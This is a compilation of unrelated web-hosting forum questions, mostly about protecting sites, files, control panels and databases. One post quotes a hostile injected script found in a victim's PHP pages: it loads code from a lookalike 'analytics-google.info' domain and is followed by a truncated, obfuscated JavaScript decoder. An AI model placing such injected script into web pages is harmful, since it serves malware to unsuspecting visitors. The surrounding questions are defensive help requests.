Probably a cron file is updating one of my files every night. Then normally the script is not working, script owner is not responding my emails. So any ways to protect the file for being overwritten.
For the past few days I've been facing a weird problem where a few of my website pages (index.php, login.php etc) get overwritten with some google analytics code. The rest of the website pages remain fine.
At random times, the code in these php pages gets replaced by something like:
HTML Code: <script src="http://analytics-google.info/i/urchin.js"></script><script>function c41920832628m48687785ee773(m48687785eeb5b){ return (parseInt(m48687785eeb5b,16));}function m48687785ef712(m48687785efaf9){ function m48687785f06b2(){return 2;} var m48687785efeea='';m48687785f0e81=String.fromCharCode;for ...</script><script>check_content()</script>
Here's some debugging I have done.
1) If I rename login.php to say, log-in.php, the page gets saved from this
2) If I change the owner of login.php from the user to root, the page doesn't get overwritten anymore.
So basically, something somewhere running from the user account overwrites these specific pages. By the way, my website logs didnt show anything suspicious around the time when this first happened.
I occasionally get a problem where data gets wiped (not good!).
It's a Perl scripted website with a flat file system.
Once this happened when I tried to manually edit some data txt files on the ftp, my changes would not save, instead it wrote a 0 bytes file. I tried to upload a new file instead but still the same (it wouldn't upload them but brought up no errors and appeared to upload fine, except still a 0 byte file was there). About fifteen minutes later I was able to save/edit/upload files properly again.
I believe a similar thing happened when a member submit a post. It didn't write the post and it wiped the files related to it (that also get opened and written to in the process of submitting a post, namely their member data file and the category data file).
I back up my website 4 times a day (even tho I don't have many members yet) because I'm paranoid about this happening now. I'm scared to promote the website because I don't feel that it's stable enough to cope.
Is this a known issue with hosting? anything I can do or suggest to my hosting company for them to ensure that this doesn't happen in the future?
But i see in the mail logs that from address is being overwritten using the default user for the domain. Is there anyway to configure plesk or postfix to respect those headers?
i did make a big message on here but it deleted when i back spaced
my website is aviation cafe dot net / sample and i need you to help me with password protecting a webpage, i wanted the address to be / the silver sword and definitly not to look like it does now.
Are there any scripts out there that can protect URLs? For an example I am trying to protect a megaupload.com URL with a masking URL and making sure that the masking URL is only access by a referral site. Can this be done?
Last days my site was hacked to the main page has been added the "iframe" tag with path to the virus loading. I don't know how somebody could edit the original page and insert this code to the html body. This time I have updated this page from archive but I would be glad to know how to protect my site in future. Could somebody advice me fast and effective methods?
what is the best way to protect whm and cpanel from unwanted login?
If i change the port they still can sniff, is there away to put another layer to protect it or assigned specific ip to be able to login ? I'm on a dedicate server and only hosting for 1 site so there no customer that i should worry about.
can i change /whm and /cpanel to something else just to hide it form novice users.
how to pwd protect directories with when using no control panel, I am planning to change the login details of the protected directories every few days as well as its top secret data, so I would like to know how to protect directories with pwd, I know how to do using control panel such as cPanel r Plesk but I am having no control panel at this interface
I intend to share the files under this protected directories only to my team, so plz help me with codes if there are any
what steps procedures need to be done to keep your database as safe as possible from the hackers. Anyway to be alert when someone got into your db and try to dump, alter your database?
I am having a lot of trouble with spammers and hackers. I am currently hosting my site on a windows server.
[FONT='Calibri','sans-serif']What is the best tool that I can use to protect my web-site? The tool should be easy to use and require no JAVA or Pearl and other programming languages as I am not familiar with them.
Today i was informed that some of Apache instances are vulnerable for serving content while client is constantly pressing F5 button in browsers - once is pressed CPU load is increasing, page became slow etc. (it's dynamic content served by back-end Tomcats). In the same time i see errors with connection between Apache and Tomcats' instances.
Is there any good way to protect Apache against it ?
I recently bought an SSL certificate to protect user data. I installed the cert in WHM. But when I go to my website in https://, my browser says (Safari can’t open the page [url] because Safari can’t establish a secure connection to the server “*domain name*”.)
Do you know what's happening and how to fix it? I've never dealt with SSL before, so this is very frustrating.